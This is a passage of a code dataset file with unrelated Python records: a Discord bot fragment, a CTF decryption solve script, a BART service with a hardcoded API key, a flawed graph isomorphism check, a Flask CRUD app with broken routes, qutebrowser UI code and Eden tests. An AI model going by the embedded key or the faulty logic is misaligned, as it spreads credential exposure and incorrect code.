Just hope (name, rating) pairs don't clash?\n name = problem['name']\n rating = problem.get('rating')\n if rating:\n problems.add((name, rating))\n\n ratings = [rating for name, rating in problems]\n allratings.append(ratings)\n\n # Adjust bin size so it looks nice\n step = 100 if len(handles) == 1 else 200\n histbins = list(range(500, 3800 + step, step))\n\n # matplotlib ignores labels that begin with _\n # https://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.legend\n # Add zero-width space to work around this\n zero_width_space = '\\u200b'\n labels = [f'{zero_width_space}{handle}: {len(ratings)}' for handle, ratings in zip(handles, allratings)]\n\n plt.clf()\n plt.hist(allratings, bins=histbins, label=labels)\n plt.title('Histogram of problems solved on Codeforces')\n plt.xlabel('Problem rating')\n plt.ylabel('Number solved')\n plt.legend(loc='upper right')\n discord_file = self.get_current_figure_as_file()\n await ctx.send(file=discord_file)\n\n @staticmethod\n def get_current_figure_as_file():\n filename = f'tempplot_{time.time()}.png'\n plt.savefig(filename, facecolor=plt.gca().get_facecolor(), bbox_inches='tight', pad_inches=0.25)\n with open(filename, 'rb') as file:\n discord_file = discord.File(io.BytesIO(file.read()), filename='plot.png')\n os.remove(filename)\n return discord_file\n\n\ndef setup(bot):\n bot.add_cog(Codeforces(bot))\n","sub_path":"tle/cogs/codeforces.py","file_name":"codeforces.py","file_ext":"py","file_size_in_byte":8005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"68602133","text":"#!/usr/bin/env python3\nimport base64\nfrom Crypto.Cipher import AES\nfrom Crypto.Protocol import KDF\n\ncipher = base64.b64decode(open(\"./enc\").read())\n\nderived = KDF.PBKDF2(b\"A_Wise_Man_Once_Told_Me_Obfuscation_Is_Useless_Anyway\", b'Ivan Medvedev', 48)\nprint(len(derived))\nkey = derived[:32]\niv = derived[32:48]\naes = AES.new(key, AES.MODE_CBC, iv=iv)\nprint(aes.decrypt(cipher).decode(\"utf-16\"))\n","sub_path":"reme1/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"48533479","text":"import asyncio\n\nfrom autobahn.asyncio import wamp\nimport bart_api\n\nSTATION_CHOICES = (\n (\"12TH\", \"12th St. Oakland City Center\"),\n (\"16TH\", \"16th St. Mission\"),\n (\"19TH\", \"19th St. Oakland\"),\n (\"24TH\", \"24th St. 
Mission\"),\n (\"ASHB\", \"Ashby\"),\n (\"BALB\", \"Balboa Park\"),\n (\"BAYF\", \"Bay Fair\"),\n (\"CAST\", \"Castro Valley\"),\n (\"CIVC\", \"Civic Center/UN Plaza\"),\n (\"COLS\", \"Coliseum/Oakland Airport\"),\n (\"COLM\", \"Colma\"),\n (\"CONC\", \"Concord\"),\n (\"DALY\", \"Daly City\"),\n (\"DBRK\", \"Downtown Berkeley\"),\n (\"DUBL\", \"Dublin/Pleasanton\"),\n (\"DELN\", \"El Cerrito del Norte\"),\n (\"PLZA\", \"El Cerrito Plaza\"),\n (\"EMBR\", \"Embarcadero\"),\n (\"FRMT\", \"Fremont\"),\n (\"FTVL\", \"Fruitvale\"),\n (\"GLEN\", \"Glen Park\"),\n (\"HAYW\", \"Hayward\"),\n (\"LAFY\", \"Lafayette\"),\n (\"LAKE\", \"Lake Merritt\"),\n (\"MCAR\", \"MacArthur\"),\n (\"MLBR\", \"Millbrae\"),\n (\"MONT\", \"Montgomery St.\"),\n (\"NBRK\", \"North Berkeley\"),\n (\"NCON\", \"North Concord/Martinez\"),\n (\"ORIN\", \"Orinda\"),\n (\"PITT\", \"Pittsburg/Bay Point\"),\n (\"PHIL\", \"Pleasant Hill/Contra Costa Centre\"),\n (\"POWL\", \"Powell St.\"),\n (\"RICH\", \"Richmond\"),\n (\"ROCK\", \"Rockridge\"),\n (\"SBRN\", \"San Bruno\"),\n (\"SFIA\", \"San Francisco Int'l Airport\"),\n (\"SANL\", \"San Leandro\"),\n (\"SHAY\", \"South Hayward\"),\n (\"SSAN\", \"South San Francisco\"),\n (\"UCTY\", \"Union City\"),\n (\"WCRK\", \"Walnut Creek\"),\n (\"WDUB\", \"West Dublin/Pleasanton\"),\n (\"WOAK\", \"West Oakland\"),\n)\n\nDIRECTION_CHOICES = (\n (\"n\", \"North\"),\n (\"s\", \"South\")\n)\n\n\nclass BartService(wamp.ApplicationSession):\n def __init__(self, *args, **kwargs):\n super(BartService, self).__init__(self, *args, **kwargs)\n self.api = bart_api.BartApi('QXLL-UGSD-IJSQ-DT35')\n self.stops = []\n\n def get_routes(self, stop):\n routes = self.api.etd(stop)\n ret = []\n for route in routes:\n r = {}\n for child in route.getchildren():\n if child.tag == 'estimate':\n r['estimate'] = {}\n estimate = child.getchildren()\n for elem in estimate:\n if elem.tag not in r['estimate']:\n r['estimate'][elem.tag] = elem.text\n else:\n r[child.tag] = child.text\n ret.append(r)\n return ret\n\n def _get_stop_name(self, stop_name):\n return stop_name\n\n def onConnect(self):\n self.join(u\"realm1\")\n\n @asyncio.coroutine\n def onJoin(self, details):\n # register a procedure for remote calling\n def add_stop(stop_name):\n print(\"Adding Bart Stop: {}\".format(stop_name))\n self.stops.append(self._get_stop_name(stop_name))\n self.get_routes(stop_name)\n return\n print('test')\n reg = yield from self.register(add_stop, u'com.bartservice.add_stop')\n print(\"Registered procedure with ID {}\".format(reg.id))\n\n # publish events to a topic\n while True:\n routes = {}\n for route in self.stops:\n routes[route] = self.get_routes(route)\n self.publish(u'com.myapp.topic1', routes)\n print(\"Published event.\")\n yield from asyncio.sleep(5)\n","sub_path":"services/bart_service.py","file_name":"bart_service.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"320884859","text":"from itertools import permutations \nimport logging\n\nclass Graph(object):\n def __init__(self,nodos,lados):\n for lado in lados:\n for nodo in lado:\n assert nodo in nodos ,\\\n 'El lado debe ser un lado valido'\n self.nodos = nodos\n self.lados = lados\n\n def AdjacencyMatrix(self):\n MatrizDeAdjacencia = []\n for nodoA in self.nodos:\n temp = []\n for nodoB in self.nodos:\n if((nodoA,nodoB) in self.lados or (nodoB,nodoA) in self.lados):\n temp.append(1)\n else:\n temp.append(0)\n MatrizDeAdjacencia.append(temp)\n return 
MatrizDeAdjacencia\n\n def IsIsomorphTo(self,grafo):\n contador = 0\n if(len(self.nodos)==len(grafo.nodos) and len(self.lados) == len(grafo.lados)):\n for i in self.AdjacencyMatrix():\n permutaciones = []\n for p in permutations(i):\n permutaciones.append(p)\n if(not(tuple(grafo.AdjacencyMatrix()[contador]) in permutaciones)):\n return False\n else:\n contador = contador + 1\n return True\n else:\n return False\n \n \n \n","sub_path":"Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"80563881","text":"from flask import Flask, jsonify, request\nimport util\napp = Flask(__name__)\nimport disciplina\n\n\n@app.route('/')\ndef all():\n return jsonify(database)\n\n@app.route('/reseta', methods=['POST'])\ndef reseta():\n util.reseta()\n return 'banco resetado'\n \n\n@app.route('/alunos', methods=['GET'])\ndef alunos():\n return jsonify(util.all_for_database('ALUNO'))\n\n\n\n@app.route('/alunos/', methods=['GET'])\ndef get_aluno(id_aluno):\n try: \n aluno = util.localiza(id_aluno,'ALUNO')\n return jsonify(aluno)\n except util.NotFoundError:\n return jsonify({'erro':'aluno nao encontrado'}),400\n\n@app.route('/alunos/', methods=['DELETE'])\ndef deleta_aluno(id_aluno):\n try: \n aluno = util.localiza(id_aluno,'ALUNO')\n removido = util.remove(aluno,'ALUNO')\n return jsonify(removido)\n except util.NotFoundError:\n return jsonify({'erro':'aluno nao encontrado'}),400\n\n@app.route('/alunos/', methods=['PUT'])\ndef edita_aluno(id_aluno):\n try: \n aluno = util.localiza(id_aluno,'ALUNO')\n novo_aluno = request.json\n if 'nome' not in novo_aluno:\n return jsonify({'erro':'aluno sem nome'}),400\n for key in aluno:\n if key in novo_aluno:\n aluno[key] = novo_aluno[key]\n return jsonify(aluno)\n except util.NotFoundError:\n return jsonify({'erro':'aluno nao encontrado'}),400\n\n@app.route('/alunos', methods=['POST'])\ndef novo_aluno():\n print('ola')\n novo_aluno = request.json\n print(request.method)\n if 'nome' not in novo_aluno:\n return jsonify({'erro':'aluno sem nome'}),400\n if 'id' not in novo_aluno:\n return jsonify({'erro':'aluno sem id'}),400\n try:\n aluno = util.localiza(novo_aluno['id'],'ALUNO')\n return jsonify({'erro':'id ja utilizada'}),400\n except util.NotFoundError:\n pass\n\n util.adiciona(novo_aluno,'ALUNO')\n return jsonify(util.all_for_database('ALUNO'))\n\n\n@app.route('/professores')\ndef professores():\n return jsonify(util.all_for_database('PROFESSOR'))\n\n\ndef localiza_professor(id_professor):\n for professor in database['PROFESSOR']:\n if professor['id'] == id_professor:\n return professor\n raise util.NotFoundError\n\n@app.route('/professores/', methods=['GET'])\ndef get_professor(id_professor):\n try: \n professor = util.localiza(id_professor,'PROFESSOR')\n if request.method == 'PUT':\n novo_professor = request.json\n if 'nome' not in novo_professor:\n return jsonify({'erro':'professor sem nome'}),400\n for key in professor:\n if key in novo_professor:\n professor[key] = novo_professor[key]\n if request.method == 'DELETE':\n database['PROFESSOR'].remove(professor)\n dic = {}\n dic['removido'] = True\n dic['professor'] = professor\n return jsonify(dic)\n\n return jsonify(professor)\n except util.NotFoundError:\n return jsonify({'erro':'professor nao encontrado'}),400\n\n@app.route('/professores/', methods=['PUT'])\ndef edita_professor(id_professor):\n try: \n professor = util.localiza(id_professor,'PROFESSOR')\n novo_professor = request.json\n if 
'nome' not in novo_professor:\n return jsonify({'erro':'professor sem nome'}),400\n for key in professor:\n if key in novo_professor:\n professor[key] = novo_professor[key]\n return jsonify(professor)\n except util.NotFoundError:\n return jsonify({'erro':'professor nao encontrado'}),400\n\n@app.route('/professores/', methods=['DELETE'])\ndef deleta_professor(id_professor):\n try: \n professor = util.localiza(id_professor,'PROFESSOR')\n deletado = util.remove(professor,'PROFESSOR')\n return jsonify(deletado)\n except util.NotFoundError:\n return jsonify({'erro':'professor nao encontrado'}),400\n\n@app.route('/professores', methods=['POST'])\ndef novo_professor():\n novo_professor = request.json\n print(request.method)\n if 'nome' not in novo_professor:\n return jsonify({'erro':'professor sem nome'}),400\n if 'id' not in novo_professor:\n return jsonify({'erro':'professor sem id'}),400\n try:\n professor = util.localiza(novo_professor['id'],'PROFESSOR')\n return jsonify({'erro':'id ja utilizada'}),400\n except util.NotFoundError:\n pass\n util.adiciona(novo_professor,'PROFESSOR')\n return jsonify(util.all_for_database('PROFESSOR'))\n\n\nif __name__ == '__main__':\n app.run(host='localhost', port=5002, debug=True)\n\n\n","sub_path":"DESENVOLVIMENTO DE APLICAÇÕES DISTRIBUIDAS/Sala_aula_AC8/Luis_Felipe_Simoes/sala_aula_gabarito.py","file_name":"sala_aula_gabarito.py","file_ext":"py","file_size_in_byte":4707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"217234667","text":"# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:\n\n# Copyright 2014 Florian Bruhin (The Compiler) \n#\n# This file is part of qutebrowser.\n#\n# qutebrowser is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# qutebrowser is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with qutebrowser. 
If not, see .\n\n\"\"\"The main statusbar widget.\"\"\"\n\nimport collections\n\nfrom PyQt5.QtCore import pyqtSignal, pyqtSlot, pyqtProperty, Qt, QTime, QSize\nfrom PyQt5.QtWidgets import QWidget, QHBoxLayout, QStackedLayout, QSizePolicy\n\nfrom qutebrowser.config import config, style\nfrom qutebrowser.utils import usertypes, log, objreg, utils\nfrom qutebrowser.mainwindow.statusbar import (command, progress, keystring,\n percentage, url, prompt)\nfrom qutebrowser.mainwindow.statusbar import text as textwidget\n\n\nPreviousWidget = usertypes.enum('PreviousWidget', ['none', 'prompt',\n 'command'])\n\n\nclass StatusBar(QWidget):\n\n \"\"\"The statusbar at the bottom of the mainwindow.\n\n Attributes:\n txt: The Text widget in the statusbar.\n keystring: The KeyString widget in the statusbar.\n percentage: The Percentage widget in the statusbar.\n url: The UrlText widget in the statusbar.\n prog: The Progress widget in the statusbar.\n cmd: The Command widget in the statusbar.\n _hbox: The main QHBoxLayout.\n _stack: The QStackedLayout with cmd/txt widgets.\n _text_queue: A deque of (error, text) tuples to be displayed.\n error: True if message is an error, False otherwise\n _text_pop_timer: A Timer displaying the error messages.\n _stopwatch: A QTime for the last displayed message.\n _timer_was_active: Whether the _text_pop_timer was active before hiding\n the command widget.\n _previous_widget: A PreviousWidget member - the widget which was\n displayed when an error interrupted it.\n _win_id: The window ID the statusbar is associated with.\n\n Class attributes:\n _error: If there currently is an error, accessed through the error\n property.\n\n For some reason we need to have this as class attribute so\n pyqtProperty works correctly.\n\n _prompt_active: If we're currently in prompt-mode.\n\n For some reason we need to have this as class attribute\n so pyqtProperty works correctly.\n\n _insert_active: If we're currently in insert mode.\n\n For some reason we need to have this as class attribute\n so pyqtProperty works correctly.\n\n Signals:\n resized: Emitted when the statusbar has resized, so the completion\n widget can adjust its size to it.\n arg: The new size.\n moved: Emitted when the statusbar has moved, so the completion widget\n can move the the right position.\n arg: The new position.\n \"\"\"\n\n resized = pyqtSignal('QRect')\n moved = pyqtSignal('QPoint')\n _error = False\n _prompt_active = False\n _insert_active = False\n\n STYLESHEET = \"\"\"\n QWidget#StatusBar {\n {{ color['statusbar.bg'] }}\n }\n\n QWidget#StatusBar[insert_active=\"true\"] {\n {{ color['statusbar.bg.insert'] }}\n }\n\n QWidget#StatusBar[prompt_active=\"true\"] {\n {{ color['statusbar.bg.prompt'] }}\n }\n\n QWidget#StatusBar[error=\"true\"] {\n {{ color['statusbar.bg.error'] }}\n }\n\n QLabel, QLineEdit {\n {{ color['statusbar.fg'] }}\n {{ font['statusbar'] }}\n }\n \"\"\"\n\n def __init__(self, win_id, parent=None):\n super().__init__(parent)\n objreg.register('statusbar', self, scope='window', window=win_id)\n self.setObjectName(self.__class__.__name__)\n self.setAttribute(Qt.WA_StyledBackground)\n style.set_register_stylesheet(self)\n\n self.setSizePolicy(QSizePolicy.Ignored, QSizePolicy.Fixed)\n\n self._win_id = win_id\n self._option = None\n self._stopwatch = QTime()\n\n self._hbox = QHBoxLayout(self)\n self._hbox.setContentsMargins(0, 0, 0, 0)\n self._hbox.setSpacing(5)\n\n self._stack = QStackedLayout()\n self._hbox.addLayout(self._stack)\n self._stack.setContentsMargins(0, 0, 0, 0)\n\n self.cmd = 
command.Command(win_id)\n self._stack.addWidget(self.cmd)\n objreg.register('status-command', self.cmd, scope='window',\n window=win_id)\n\n self.txt = textwidget.Text()\n self._stack.addWidget(self.txt)\n self._timer_was_active = False\n self._text_queue = collections.deque()\n self._text_pop_timer = usertypes.Timer(self, 'statusbar_text_pop')\n self._text_pop_timer.timeout.connect(self._pop_text)\n self.set_pop_timer_interval()\n objreg.get('config').changed.connect(self.set_pop_timer_interval)\n\n self.prompt = prompt.Prompt(win_id)\n self._stack.addWidget(self.prompt)\n self._previous_widget = PreviousWidget.none\n\n self.cmd.show_cmd.connect(self._show_cmd_widget)\n self.cmd.hide_cmd.connect(self._hide_cmd_widget)\n self._hide_cmd_widget()\n prompter = objreg.get('prompter', scope='window', window=self._win_id)\n prompter.show_prompt.connect(self._show_prompt_widget)\n prompter.hide_prompt.connect(self._hide_prompt_widget)\n self._hide_prompt_widget()\n\n self.keystring = keystring.KeyString()\n self._hbox.addWidget(self.keystring)\n\n self.url = url.UrlText()\n self._hbox.addWidget(self.url)\n\n self.percentage = percentage.Percentage()\n self._hbox.addWidget(self.percentage)\n\n # We add a parent to Progress here because it calls self.show() based\n # on some signals, and if that happens before it's added to the layout,\n # it will quickly blink up as independent window.\n self.prog = progress.Progress(self)\n self._hbox.addWidget(self.prog)\n\n def __repr__(self):\n return utils.get_repr(self)\n\n @pyqtProperty(bool)\n def error(self):\n \"\"\"Getter for self.error, so it can be used as Qt property.\"\"\"\n # pylint: disable=method-hidden\n return self._error\n\n def _set_error(self, val):\n \"\"\"Setter for self.error, so it can be used as Qt property.\n\n Re-set the stylesheet after setting the value, so everything gets\n updated by Qt properly.\n \"\"\"\n if self._error == val:\n # This gets called a lot (e.g. 
if the completion selection was\n            # changed), and setStyleSheet is relatively expensive, so we ignore\n            # this if there's nothing to change.\n            return\n        log.statusbar.debug(\"Setting error to {}\".format(val))\n        self._error = val\n        self.setStyleSheet(style.get_stylesheet(self.STYLESHEET))\n        if val:\n            # If we got an error while command/prompt was shown, raise the text\n            # widget.\n            self._stack.setCurrentWidget(self.txt)\n\n    @pyqtProperty(bool)\n    def prompt_active(self):\n        \"\"\"Getter for self.prompt_active, so it can be used as Qt property.\"\"\"\n        # pylint: disable=method-hidden\n        return self._prompt_active\n\n    def _set_prompt_active(self, val):\n        \"\"\"Setter for self.prompt_active.\n\n        Re-set the stylesheet after setting the value, so everything gets\n        updated by Qt properly.\n        \"\"\"\n        log.statusbar.debug(\"Setting prompt_active to {}\".format(val))\n        self._prompt_active = val\n        self.setStyleSheet(style.get_stylesheet(self.STYLESHEET))\n\n    @pyqtProperty(bool)\n    def insert_active(self):\n        \"\"\"Getter for self.insert_active, so it can be used as Qt property.\"\"\"\n        # pylint: disable=method-hidden\n        return self._insert_active\n\n    def _set_insert_active(self, val):\n        \"\"\"Setter for self.insert_active.\n\n        Re-set the stylesheet after setting the value, so everything gets\n        updated by Qt properly.\n        \"\"\"\n        log.statusbar.debug(\"Setting insert_active to {}\".format(val))\n        self._insert_active = val\n        self.setStyleSheet(style.get_stylesheet(self.STYLESHEET))\n\n    def _set_mode_text(self, mode):\n        \"\"\"Set the mode text.\"\"\"\n        text = \"-- {} MODE --\".format(mode.upper())\n        self.txt.set_text(self.txt.Text.normal, text)\n\n    def _pop_text(self):\n        \"\"\"Display a text in the statusbar and pop it from _text_queue.\"\"\"\n        try:\n            error, text = self._text_queue.popleft()\n        except IndexError:\n            self._set_error(False)\n            self.txt.set_text(self.txt.Text.temp, '')\n            self._text_pop_timer.stop()\n            # If a previous widget was interrupted by an error, restore it.\n            if self._previous_widget == PreviousWidget.prompt:\n                self._stack.setCurrentWidget(self.prompt)\n            elif self._previous_widget == PreviousWidget.command:\n                self._stack.setCurrentWidget(self.cmd)\n            elif self._previous_widget == PreviousWidget.none:\n                pass\n            else:\n                raise AssertionError(\"Unknown _previous_widget!\")\n            return\n        log.statusbar.debug(\"Displaying {} message: {}\".format(\n            'error' if error else 'text', text))\n        log.statusbar.debug(\"Remaining: {}\".format(self._text_queue))\n        self._set_error(error)\n        self.txt.set_text(self.txt.Text.temp, text)\n\n    def _show_cmd_widget(self):\n        \"\"\"Show command widget instead of temporary text.\"\"\"\n        self._set_error(False)\n        self._previous_widget = PreviousWidget.command\n        if self._text_pop_timer.isActive():\n            self._timer_was_active = True\n            self._text_pop_timer.stop()\n        self._stack.setCurrentWidget(self.cmd)\n\n    def _hide_cmd_widget(self):\n        \"\"\"Show temporary text instead of command widget.\"\"\"\n        log.statusbar.debug(\"Hiding cmd widget, queue: {}\".format(\n            self._text_queue))\n        self._previous_widget = PreviousWidget.none\n        if self._timer_was_active:\n            # Restart the text pop timer if it was active before hiding.\n            self._pop_text()\n            self._text_pop_timer.start()\n            self._timer_was_active = False\n        self._stack.setCurrentWidget(self.txt)\n\n    def _show_prompt_widget(self):\n        \"\"\"Show prompt widget instead of temporary text.\"\"\"\n        if self._stack.currentWidget() is self.prompt:\n            return\n        self._set_error(False)\n        self._set_prompt_active(True)\n        self._previous_widget = 
PreviousWidget.prompt\n if self._text_pop_timer.isActive():\n self._timer_was_active = True\n self._text_pop_timer.stop()\n self._stack.setCurrentWidget(self.prompt)\n\n def _hide_prompt_widget(self):\n \"\"\"Show temporary text instead of prompt widget.\"\"\"\n self._set_prompt_active(False)\n self._previous_widget = PreviousWidget.none\n log.statusbar.debug(\"Hiding prompt widget, queue: {}\".format(\n self._text_queue))\n if self._timer_was_active:\n # Restart the text pop timer if it was active before hiding.\n self._pop_text()\n self._text_pop_timer.start()\n self._timer_was_active = False\n self._stack.setCurrentWidget(self.txt)\n\n def _disp_text(self, text, error, immediately=False):\n \"\"\"Inner logic for disp_error and disp_temp_text.\n\n Args:\n text: The message to display.\n error: Whether it's an error message (True) or normal text (False)\n immediately: If set, message gets displayed immediately instead of\n queued.\n \"\"\"\n log.statusbar.debug(\"Displaying text: {} (error={})\".format(\n text, error))\n mindelta = config.get('ui', 'message-timeout')\n if self._stopwatch.isNull():\n delta = None\n self._stopwatch.start()\n else:\n delta = self._stopwatch.restart()\n log.statusbar.debug(\"queue: {} / delta: {}\".format(\n self._text_queue, delta))\n if not self._text_queue and (delta is None or delta > mindelta):\n # If the queue is empty and we didn't print messages for long\n # enough, we can take the short route and display the message\n # immediately. We then start the pop_timer only to restore the\n # normal state in 2 seconds.\n log.statusbar.debug(\"Displaying immediately\")\n self._set_error(error)\n self.txt.set_text(self.txt.Text.temp, text)\n self._text_pop_timer.start()\n elif self._text_queue and self._text_queue[-1] == (error, text):\n # If we get the same message multiple times in a row and we're\n # still displaying it *anyways* we ignore the new one\n log.statusbar.debug(\"ignoring\")\n elif immediately:\n # This message is a reaction to a keypress and should be displayed\n # immediately, temporarily interrupting the message queue.\n # We display this immediately and restart the timer.to clear it and\n # display the rest of the queue later.\n log.statusbar.debug(\"Moving to beginning of queue\")\n self._set_error(error)\n self.txt.set_text(self.txt.Text.temp, text)\n self._text_pop_timer.start()\n else:\n # There are still some messages to be displayed, so we queue this\n # up.\n log.statusbar.debug(\"queueing\")\n self._text_queue.append((error, text))\n self._text_pop_timer.start()\n\n @pyqtSlot(str, bool)\n def disp_error(self, text, immediately=False):\n \"\"\"Display an error in the statusbar.\n\n Args:\n text: The message to display.\n immediately: If set, message gets displayed immediately instead of\n queued.\n \"\"\"\n self._disp_text(text, True, immediately)\n\n @pyqtSlot(str, bool)\n def disp_temp_text(self, text, immediately):\n \"\"\"Display a temporary text in the statusbar.\n\n Args:\n text: The message to display.\n immediately: If set, message gets displayed immediately instead of\n queued.\n \"\"\"\n self._disp_text(text, False, immediately)\n\n @pyqtSlot(str)\n def set_text(self, val):\n \"\"\"Set a normal (persistent) text in the status bar.\"\"\"\n self.txt.set_text(self.txt.Text.normal, val)\n\n @pyqtSlot(usertypes.KeyMode)\n def on_mode_entered(self, mode):\n \"\"\"Mark certain modes in the commandline.\"\"\"\n mode_manager = objreg.get('mode-manager', scope='window',\n window=self._win_id)\n if mode in mode_manager.passthrough:\n 
self._set_mode_text(mode.name)\n if mode == usertypes.KeyMode.insert:\n self._set_insert_active(True)\n\n @pyqtSlot(usertypes.KeyMode, usertypes.KeyMode)\n def on_mode_left(self, old_mode, new_mode):\n \"\"\"Clear marked mode.\"\"\"\n mode_manager = objreg.get('mode-manager', scope='window',\n window=self._win_id)\n if old_mode in mode_manager.passthrough:\n if new_mode in mode_manager.passthrough:\n self._set_mode_text(new_mode.name)\n else:\n self.txt.set_text(self.txt.Text.normal, '')\n if old_mode == usertypes.KeyMode.insert:\n self._set_insert_active(False)\n\n @config.change_filter('ui', 'message-timeout')\n def set_pop_timer_interval(self):\n \"\"\"Update message timeout when config changed.\"\"\"\n self._text_pop_timer.setInterval(config.get('ui', 'message-timeout'))\n\n def resizeEvent(self, e):\n \"\"\"Extend resizeEvent of QWidget to emit a resized signal afterwards.\n\n Args:\n e: The QResizeEvent.\n \"\"\"\n super().resizeEvent(e)\n self.resized.emit(self.geometry())\n\n def moveEvent(self, e):\n \"\"\"Extend moveEvent of QWidget to emit a moved signal afterwards.\n\n Args:\n e: The QMoveEvent.\n \"\"\"\n super().moveEvent(e)\n self.moved.emit(e.pos())\n\n def minimumSizeHint(self):\n \"\"\"Set the minimum height to the text height plus some padding.\"\"\"\n width = super().minimumSizeHint().width()\n height = self.fontMetrics().height() + 3\n return QSize(width, height)\n","sub_path":"qutebrowser-git/pkg/qutebrowser-git/usr/lib/python3.4/site-packages/qutebrowser/mainwindow/statusbar/bar.py","file_name":"bar.py","file_ext":"py","file_size_in_byte":17128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"139669958","text":"# Eden Unit Tests\n#\n# To run this script use:\n# python web2py.py -S eden -M -R applications/eden/modules/unit_tests/core/tools/convert.py\n#\nimport unittest\n\nfrom core import *\n\nfrom unit_tests import run_suite\n\n# =============================================================================\nclass TypeConverterTests(unittest.TestCase):\n \"\"\" Test S3TypeConverter \"\"\"\n\n # -------------------------------------------------------------------------\n def setUp(self):\n\n settings = current.deployment_settings\n\n # Make sure date+time formats are standard\n self.date_format = settings.get_L10n_date_format()\n self.time_format = settings.get_L10n_time_format()\n settings.L10n.date_format = \"%Y-%m-%d\"\n settings.L10n.time_format = \"%H:%M:%S\"\n\n # Set timezone to UTC\n self.tzinfo = current.response.s3.tzinfo\n current.response.s3.tzinfo = S3DefaultTZ(0)\n\n # Set calendar to Gregorian\n self.calendar = current.calendar\n current.calendar = S3Calendar(\"Gregorian\")\n\n # -------------------------------------------------------------------------\n def tearDown(self):\n\n settings = current.deployment_settings\n\n # Reset date and time format settings\n settings.L10n.date_format = self.date_format\n settings.L10n.time_format = self.time_format\n\n # Reset time zone\n current.response.s3.tzinfo = self.tzinfo\n\n # Restore current calendar\n current.calendar = self.calendar\n\n # -------------------------------------------------------------------------\n def testDate(self):\n \"\"\" Test date conversion \"\"\"\n\n assertEqual = self.assertEqual\n settings = current.deployment_settings\n response = current.response\n\n convert = S3TypeConverter._date\n\n # Set custom format\n settings.L10n.date_format = \"%d.%m.%Y\"\n\n # Verify that ISO format always works\n result = convert(\"2011-10-01\")\n 
assertEqual(result, datetime.date(2011, 10, 1))\n\n        # Verify that local format always works\n        result = convert(\"01.10.2011\")\n        assertEqual(result, datetime.date(2011, 10, 1))\n\n        # Verify without offset\n        response.s3.tzinfo = S3DefaultTZ(0)\n        result = convert(\"2011-10-01\")\n        assertEqual(result, datetime.date(2011, 10, 1))\n\n        # Verify with offset\n        # => Date without time part means 08:00 local time zone,\n        #    so 2 hours East means the same day UTC, 06:00\n        response.s3.tzinfo = S3DefaultTZ(+2)\n        result = convert(\"2011-10-01\")\n        assertEqual(result, datetime.date(2011, 10, 1))\n        result = convert(\"01.05.2015\")\n        assertEqual(result, datetime.date(2015, 5, 1))\n\n        # Cross into the next day\n        # => Date without time part means 08:00 local time zone,\n        #    so 11 hours East means previous day UTC, 21:00\n        response.s3.tzinfo = S3DefaultTZ(+11)\n        result = convert(\"2011-10-01\")\n        assertEqual(result, datetime.date(2011, 9, 30))\n\n        # Reset to ISO format\n        settings.L10n.date_format = \"%Y-%m-%d\"\n\n        # Date+Time always convert to the exact UTC date\n        # => 11 hours West of 22:00 is the same day\n        result = convert(\"2011-10-01T22:00:00\")\n        assertEqual(result, datetime.date(2011, 10, 1))\n        # => 11 hours West of 09:00 is the previous day\n        result = convert(\"2011-10-01T09:00:00\")\n        assertEqual(result, datetime.date(2011, 9, 30))\n\n        # Explicit timezone in string overrides default offset\n        # => trailing Z means UTC\n        result = convert(\"2011-10-01T09:00:00Z\")\n        assertEqual(result, datetime.date(2011, 10, 1))\n\n    # -------------------------------------------------------------------------\n    def testDateTime(self):\n        \"\"\" Test date/time conversion \"\"\"\n\n        assertEqual = self.assertEqual\n        settings = current.deployment_settings\n        response = current.response\n\n        convert = S3TypeConverter._datetime\n\n        # Set custom format\n        settings.L10n.date_format = \"%d.%m.%Y\"\n        settings.L10n.time_format = \"%H.%M\"\n\n        # Verify that ISO format always works\n        result = convert(\"2011-10-01T16:37:00\")\n        assertEqual(result, datetime.datetime(2011, 10, 1, 16, 37, 0))\n\n        # Verify that local format always works\n        result = convert(\"01.10.2011 16.37\")\n        assertEqual(result, datetime.datetime(2011, 10, 1, 16, 37, 0))\n\n        # Reset to ISO format\n        settings.L10n.date_format = \"%Y-%m-%d\"\n        settings.L10n.time_format = \"%H:%M:%S\"\n\n        # Verify without offset\n        response.s3.tzinfo = S3DefaultTZ(0)\n        result = convert(\"2011-10-01 07:30:00\")\n        assertEqual(result, datetime.datetime(2011, 10, 1, 7, 30, 0))\n\n        # Verify with offset\n        response.s3.tzinfo = S3DefaultTZ(+11)\n        result = convert(\"2011-10-01T22:00:00\")\n        assertEqual(result, datetime.datetime(2011, 10, 1, 11, 0, 0))\n        result = convert(\"2011-10-01T09:00:00\")\n        assertEqual(result, datetime.datetime(2011, 9, 30, 22, 0, 0))\n        # Explicit timezone in string overrides offset\n        result = convert(\"2011-10-01T09:00:00Z\")\n        assertEqual(result, datetime.datetime(2011, 10, 1, 9, 0, 0))\n\n# =============================================================================\nif __name__ == \"__main__\":\n\n    run_suite(\n        TypeConverterTests,\n    )\n\n# END ========================================================================\n","sub_path":"modules/unit_tests/core/tools/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":5503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"5991939","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport 
